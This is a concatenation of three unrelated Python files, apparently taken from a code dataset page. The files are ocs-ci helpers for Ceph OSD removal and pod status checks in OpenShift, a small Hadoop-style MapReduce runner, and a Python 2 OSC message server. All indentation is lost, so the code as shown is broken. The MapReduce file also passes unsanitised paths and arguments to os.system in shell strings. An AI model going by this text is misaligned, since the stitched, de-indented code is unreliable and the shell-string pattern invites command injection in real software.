logger.info(f"Executing OSD removal job on OSD ids: {osd_ids_str}")
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd)
# Add the namespace param, so that the ocs-osd-removal job will be created in the correct namespace
osd_removal_job_yaml["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
osd_removal_job = OCS(**osd_removal_job_yaml)
osd_removal_job.create(do_reload=False)
return osd_removal_job
def verify_osd_removal_job_completed_successfully(osd_id):
"""
Verify that the ocs-osd-removal job completed successfully
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job completed successfully. False, otherwise
"""
logger.info("Getting the ocs-osd-removal pod name")
osd_removal_pod_name = get_osd_removal_pod_name(osd_id)
osd_removal_pod_obj = get_pod_obj(
osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
timeout = 300
try:
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=osd_removal_pod_name,
sleep=20,
timeout=timeout,
)
# Don't failed the test yet if the ocs-osd-removal pod job is not completed
except TimeoutExpiredError:
is_completed = False
ocp_pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_pod_status = ocp_pod_obj.get_resource_status(osd_removal_pod_name)
# Check if 'osd_removal_pod' is in status 'completed'
if not is_completed and osd_removal_pod_status != constants.STATUS_COMPLETED:
if osd_removal_pod_status != constants.STATUS_RUNNING:
logger.info(
f"ocs-osd-removal pod job did not reach status '{constants.STATUS_COMPLETED}' "
f"or '{constants.STATUS_RUNNING}' after {timeout} seconds"
)
return False
else:
logger.info(
f"ocs-osd-removal pod job reached status '{constants.STATUS_RUNNING}',"
f" but we were waiting for status '{constants.STATUS_COMPLETED}' "
)
new_timeout = 900
logger.info(
f"Wait more {new_timeout} seconds for ocs-osd-removal pod job to be completed"
)
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=osd_removal_pod_name,
sleep=30,
timeout=new_timeout,
)
if not is_completed:
logger.info(
f"ocs-osd-removal pod job did not complete after {new_timeout} seconds"
)
return False
# Verify OSD removal from the ocs-osd-removal pod logs
logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs")
logs = get_pod_logs(osd_removal_pod_name)
pattern = f"purged osd.{osd_id}"
if not re.search(pattern, logs):
logger.warning(
f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs"
)
return False
return True
def delete_osd_removal_job(osd_id):
"""
Delete the ocs-osd-removal job.
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job deleted successfully. False, otherwise
"""
ocs_version = config.ENV_DATA["ocs_version"]
if Version.coerce(ocs_version) >= Version.coerce("4.7"):
job_name = "ocs-osd-removal-job"
else:
job_name = f"ocs-osd-removal-{osd_id}"
osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job.delete()
try:
osd_removal_job.ocp.wait_for_delete(resource_name=job_name)
except TimeoutError:
logger.warning(f"{job_name} job did not get deleted successfully")
return False
return True
def get_deployment_name(pod_name):
"""
Get the deployment of the pod.
Args:
pod_name (str): The pod's name.
Returns:
The deployment of the specific pod name
"""
return "-".join(pod_name.split("-")[:-2])
def get_osd_pod_id(osd_pod):
"""
Get the osd pod id
Args:
osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object
Returns:
str: The osd pod id
"""
return osd_pod.get().get("metadata").get("labels").get("ceph-osd-id")
def get_pods_in_statuses(status_options, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Get all the pods in specific statuses
Args:
status_options (list): The list of the status options.
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: All the pods that their status in the 'status_options' list.
"""
pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
pods_in_status_options = list()
for p in pods:
pod_status = ocp_pod_obj.get_resource_status(p.name)
if pod_status in status_options:
pods_in_status_options.append(p)
return pods_in_status_options
def get_pod_ceph_daemon_type(pod_obj):
"""
Get the ceph daemon type of the pod object
Args:
pod_obj (Pod): the pod object
Returns:
str: The pod's ceph daemon type
"""
return pod_obj.get_labels().get("ceph_daemon_type")
def check_pods_after_node_replacement():
"""
Check the pods status after the node replacement process.
Returns:
bool: True if all the pods are running after a specific time. False otherwise.
"""
are_pods_running = wait_for_pods_to_be_running(timeout=180)
if are_pods_running:
return True
not_ready_statuses = [
constants.STATUS_ERROR,
constants.STATUS_PENDING,
constants.STATUS_CLBO,
constants.STATUS_TERMINATING,
]
pods_not_ready = get_pods_in_statuses(status_options=not_ready_statuses)
if len(pods_not_ready) == 0:
logger.info("All the pods are running")
return True
if len(pods_not_ready) > 1:
logger.warning("More than one pod is not running")
return False
# if len(pods_not_ready) == 1
pod_not_ready = pods_not_ready[0]
pod_daemon_type = get_pod_ceph_daemon_type(pod_not_ready)
if pod_daemon_type == constants.MON_DAEMON:
logger.info(
f"One of the '{pod_daemon_type}' pods is not running, "
f"but all the other pods are running"
)
timeout = 1500
logger.info(
f"waiting another {timeout} seconds for all the pods to be running..."
)
are_pods_running = wait_for_pods_to_be_running(timeout=timeout, sleep=30)
if are_pods_running:
logger.info("All the pods are running")
return True
else:
logger.warning(
f"Not all the pods are in a running state after {timeout} seconds"
)
return False
else:
logger.warning(f"One of the '{pod_daemon_type}' pods is not running")
return False
def get_osd_pods_having_ids(osd_ids):
"""
Get the osd pods having specific ids
Args:
osd_ids (list): The list of the osd ids
Returns:
list: The osd pods having the osd ids
"""
# Convert it to set to reduce complexity
osd_ids_set = set(osd_ids)
osd_pods_having_ids = []
osd_pods = get_osd_pods()
for osd_pod in osd_pods:
if get_osd_pod_id(osd_pod) in osd_ids_set:
osd_pods_having_ids.append(osd_pod)
return osd_pods_having_ids
def get_pod_objs(
pod_names,
raise_pod_not_found_error=False,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Get the pod objects of the specified pod names
Args:
pod_names (list): The list of the pod names to get their pod objects
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods
in the pod names are not found. If False, it ignores the case of pod not found and
returns the pod objects of the rest of the pod names. The default value is False
Returns:
list: The pod objects of the specified pod names
Raises:
ResourceNotFoundError: If 'raise_pod_not_found_error' is True,
and not all the pod names were found
"""
# Convert it to set to reduce complexity
pod_names_set = set(pod_names)
pods = get_all_pods(namespace=namespace)
pod_objs_found = [p for p in pods if p.name in pod_names_set]
if len(pod_names) > len(pod_objs_found):
pod_names_found_set = {p.name for p in pod_objs_found}
pod_names_not_found = list(pod_names_set - pod_names_found_set)
error_message = f"Did not find the following pod names: {pod_names_not_found}"
if raise_pod_not_found_error:
raise ResourceNotFoundError(error_message)
else:
logger.info(error_message)
return pod_objs_found
def wait_for_change_in_pods_statuses(
pod_names,
current_statuses=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
timeout=300,
sleep=20,
):
"""
Wait for the pod statuses in a specific namespace to change.
Args:
pod_names (list): List of the pod names to check if their status changed.
namespace (str): the namespace ot the pods
current_statuses (list): The current pod statuses. These are the pod statuses
to check if they changed during each iteration.
timeout (int): time to wait for pod statuses to change
sleep (int): Time in seconds to sleep between attempts
Returns:
bool: True, if the pod statuses have changed. False, otherwise
"""
if current_statuses is None:
# If 'current_statuses' is None the default value will be the ready statues
current_statuses = [constants.STATUS_RUNNING, constants.STATUS_COMPLETED]
try:
for pod_objs in TimeoutSampler(
timeout=timeout,
sleep=sleep,
func=get_pod_objs,
namespace=namespace,
pod_names=pod_names,
):
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
if len(pod_objs) < len(pod_names):
pod_names_found_set = {p.name for p in pod_objs}
pod_names_not_found = list(set(pod_names) - pod_names_found_set)
logger.info(f"Some of the pods have not found: {pod_names_not_found}")
return True
for p in pod_objs:
try:
pod_status = ocp_pod_obj.get_resource_status(p.name)
except CommandFailed as ex:
logger.info(
f"Can't get the status of the pod {p.name} due to the error: {ex}"
)
continue
if pod_status not in current_statuses:
logger.info(
f"The status of the pod '{p.name}' has changed to '{pod_status}'"
)
return True
except TimeoutExpiredError:
logging.info(f"The status of the pods did not change after {timeout} seconds")
return False
def get_rook_ceph_pod_names():
"""
Get all the rook ceph pod names
Returns:
list: List of the rook ceph pod names
"""
rook_ceph_pod_names = get_pod_name_by_pattern("rook-ceph-")
# Exclude the rook ceph pod tools because it creates by OCS and not rook ceph operator
return [
pod_name
for pod_name in rook_ceph_pod_names
if not pod_name.startswith("rook-ceph-tools-")
]
def get_mon_pod_id(mon_pod):
"""
Get the mon pod id
Args:
mon_pod (ocs_ci.ocs.resources.pod.Pod): The mon pod object
Returns:
str: The mon pod id
"""
return mon_pod.get().get("metadata").get("labels").get("ceph_daemon_id")
|
hadoopjobs.py
|
import os,json,pathlib
import threading
def mapping(filen,i,splits,local_path_mapper,output,arguements):
a=filen[0]+'_'+str(i)+'.'+filen[1]
rep = len(splits[a])
inp = '-1'
for i in range(rep):
if not pathlib.Path(splits[a][i]).exists:
i+=1
else:
inp = splits[a][i]
break
if inp == "-1":
print("File is corrupted. Please re-upload input files.")
return
try:
os.system('cat ' + inp +' | python3 '+local_path_mapper+ " "+ arguements+ ' >'+output)
with open(output,'r') as f1,open('moutput.txt','a') as f2:
f2.writelines(f1.readlines())
except:
print("Mapper Path not Found.")
f1.close()
f2.close()
def mapreduce(path_to_dataset,local_path_to_output,local_path_mapper,local_path_reducer,args,path_to_namenodes,fs_path):
arguements=""
for i in args:
arguements+=str(i)+" "
try:
with open(os.path.join(path_to_namenodes,'namenode.json'),'r') as f:
data = json.load(f)
except:
print("Cannot access Namenode.")
return
splits=data[fs_path+path_to_dataset]
# print(len(splits))
filename=path_to_dataset.split('/')
filen=filename[-1].split('.')
try:
with open('moutput.txt','w') as f1:
f1.write('')
except:
print("Error in storing mapper output.")
return
for i in range(1,len(splits)+1,2):
try:
t1 = threading.Thread(target=mapping, args=(filen,i,splits,local_path_mapper,"output.txt",arguements))
t1.start()
if(i+1<len(splits)+1):
t2 = threading.Thread(target=mapping, args=(filen,i+1,splits,local_path_mapper,"output2.txt",arguements))
t2.start()
t1.join()
try:
t2.join()
except:
pass
except:
print("Error was caused during Multithreading.")
try:
os.system("cat moutput.txt | sort -k 1,1 | python3 "+local_path_reducer+' >'+local_path_to_output)
os.remove("output.txt")
os.remove("output2.txt")
except:
print("Reducer Path not Found.")
|
osc_receive.py
|
import socket, OSC, re, time, threading, math
import event
class PiException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class OscReceive :
def __init__(self, port):
self.receive_address = '0.0.0.0', port #Mac Adress, Outgoing Port
self.s = OSC.OSCServer(self.receive_address)
self.s.addDefaultHandlers()
self.setup("/test")
# Start OSCServer
print "\nStarting OSCServer. Use ctrl-C to quit."
self.st = threading.Thread( target = self.s.serve_forever )
self.st.start()
def setup(self, adr):
self.s.addMsgHandler(adr, self.callback)
print "Registered Callback-functions are :"
for addr in self.s.getOSCAddressSpace():
print addr
def callback(self, add, tags, stuff, source):
print add
event.bang(add, stuff)
def terminate(self):
print "\nClosing OSCServer."
self.s.close()
print "Waiting for Server-thread to finish"
self.st.join()
print "Done"
# ADD callbacl function with event.py as follows,
# import event
# def foo(vals):
# for val in vals:
# print val
# event.add("foo",foo)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.